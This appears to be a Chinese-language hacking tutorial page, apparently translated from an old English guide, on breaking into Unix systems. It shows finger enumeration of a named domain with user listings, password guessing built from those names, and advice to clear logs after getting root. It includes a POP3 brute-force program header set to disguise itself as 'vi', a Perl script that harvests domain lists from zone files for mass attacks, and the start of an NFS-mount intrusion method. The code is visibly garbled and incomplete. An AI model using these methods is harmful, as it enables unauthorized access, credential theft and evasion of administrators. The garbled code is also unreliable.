我要评论--------------------------------------------------------------------------------
困难的方法
这是另一种方法.可以确定的说,大多数的大系统都有用户在使用不可靠口令.在shell环境下:
finger @domainname.com 我用真正的域名:
[10:35am][/home/ii]finger @starnet.net
[starnet.net]
login name tty idle login time office office phone
chris chris myers p2 4:46 jan 27 11:19
mike mike suter p1 4:57 jan 22 16:14
mike mike suter p5 3d jan 16 15:35
root system administrator p3 4:59 jan 16 10:17
wendt catherine wendt-bern p0 3 jan 21 14:49
[10:35am][/home/ii]
现在我们可以尝试这样登陆:
login:chris passwword 试一试:chris,chris,myers,myers,chrismyers,等等…
这个看起来不错:wendt:catherine:catherine
下面是另一个命令:
[10:35am][/home/ii]finger -l @starnet.net
[starnet.net]
login: mike name: mike suter
directory: /usra/staff/mike shell: /bin/csh
on since wed jan 22 16:14 (cst) on ttyp1, idle 5:26, from mikesbox.starnet.net
on since thu jan 16 15:35 (cst) on ttyp5, idle 3 days 22:00, from mikesbox
last login sun jan 26 23:07 (cst) on ttyp2 from hurk
no plan.
login: root name: system administrator
directory: /root shell: /bin/csh
on since thu jan 16 10:17 (cst) on ttyp3, idle 5:28, from mikesbox.starnet.net
last login thu jan 16 18:07 (cst) on ttyp6 from mikesbox.starnet.net
mail forwarded to:
\chris@admin.starnet.net
#\chris@admin.starnet.net, \mike@admin.starnet.net
no plan.
login: wendt name: catherine wendt-bernal
directory: /usra/staff/wendt shell: /bin/csh
on since tue jan 21 14:49 (cst) on ttyp0, idle 0:02, from veggedout
no plan.
你有更多可利用的消息了;)
我知道这让你厌烦...
记住你的尝试会被记录,所以如果你成功进入并获得root权限的话,记得清除日志:)
以下是一个成功进入后用得着的c小程序.
pop3hack.c
----- cut here
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* first, define the pop-3 port - almost always 110 */
#define pop3_port 110
/* what we want our program to be masked as, so nosy sys admin's don't kill us */
#define maskas "vi"
/* repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. if set to 0, it will hack until it finds
1 user/password then exit. if set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define reconnect 0
----- cut here
你也可自己写一小perl脚本程序,能自动finger 列表中的域名并记录响应信息到文件中,finger完后返回并尝试使用pop3端口,以 用户名-用户名(或其他信息)方式(译注:即口令用用户名或其他信息)登陆,记录响应信息到另一文件中.(这就是emailcrk的原理)
ftp到rs.internic.net中,在域名目录中你会找到:
com.zone.>
--------------------------------------------------------------------------------
传输中断!
ov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz
down下这些文档,在攻击目标域名上运行getdomain.pl(下面的脚本),如:
"perl getdomain.pl com.zone com >com.all"
这条指令所做的就是解开所.com的域名并放在comm.all文档中.
如果想解开.edu,只需:
perl getdomain.pl edu.zone edu >edu.all
现在你就有了名为edu.all的域名列表供你用了
下面是perl 脚本:
getdomain.pl
---- cut here
#!/usr/bin/perl
# getdomain by nfin8 / invisible evil
# questions /msg i-e or /msg i^e
#
# retrieve command line arguments.
my($inputfile, $domain) = @argv;
usage() if (!defined($inputfile) || !defined($domain));
# open and preprocess the input file.
open(infile, ";
# initialize main data structure.
my(%hash) = {};
my($key) = "";
foreach (@lines) {
$key = (split(/\ /))[0];
chop($key);
next if ((($key =~ tr/.//) < 1) ||
(uc($domain) ne uc(((split(/\./, $key))[-1]))) ||
($key =~ m/root-server/i));
$hash ;
}
# close input file and output data structure to stdout.
close(infile);
foreach (sort(keys(%hash))) {
print "用户名:@hackbase.net密码:
\n";
}
sub usage {
print("\n\ngetdomain:\n");
print("usage: getdomain [inputfile] [search]\n\n");
print("where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n");
exit(0);
}
0;
---- cut here - end of script -----
要使用上述脚本,你只需把上面几行copy下来命名为getdomain.pl,拷贝到unix系统中,运行: chmod x getdomain.pl
即可.
这时就可运行上面所讲的命令行了.
--------------------------------------------------------------------------------
使用mount得到unix系统访问权限
这并不难而且网络上有很多系统是mountable(可共享的)的.mount是一个unix命令允许你在远程机器驱动器安装系统.这样一来,你既可从其他机器进行安装过程也可仅仅共享网络中的磁盘和目录.问题在于许多管理员过于精通unix命令和设置.或者是太懒惰而把磁盘设置为全局属性,却不明白全局mount(连接或共享)该磁盘,别人就能获得对他们的用户目录的写权限.
开始,你需要一个hack过的root帐号.为了能mount(连接或共享)远程磁盘并获取权限,你要修改系统的password文档并使用su命令.
如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!
网友评论